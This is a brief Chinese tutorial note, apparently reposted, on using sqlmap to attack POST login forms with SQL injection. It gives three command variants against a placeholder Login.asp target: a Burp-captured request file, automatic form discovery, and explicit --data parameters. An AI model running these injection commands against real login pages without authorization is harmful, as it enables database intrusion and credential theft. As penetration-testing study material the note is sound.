您的位置:首页 > 数据库

4.羽翼sqlmap学习笔记之Post登录框注入

2014-11-28 18:01 453 查看
4.Sqlmap系列教程——post登录框注入
注入点:

http://xxx.xxx.com/Login.asp


注入方式一:

1.对着注入点使用burp抓包,保存txt格式文件。

2.输入命令:

./sqlmap.py -r search-test.txt -p tfUPass


注入方式二:自动搜索表单的方式

sqlmap -u http://xxx.xxx.com/Login.asp --forms


注入方式三:指定一个参数的方法

sqlmap -u http://xxx.xxx.com/Login.asp --data "tfUName=1&tfUPass=1"
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: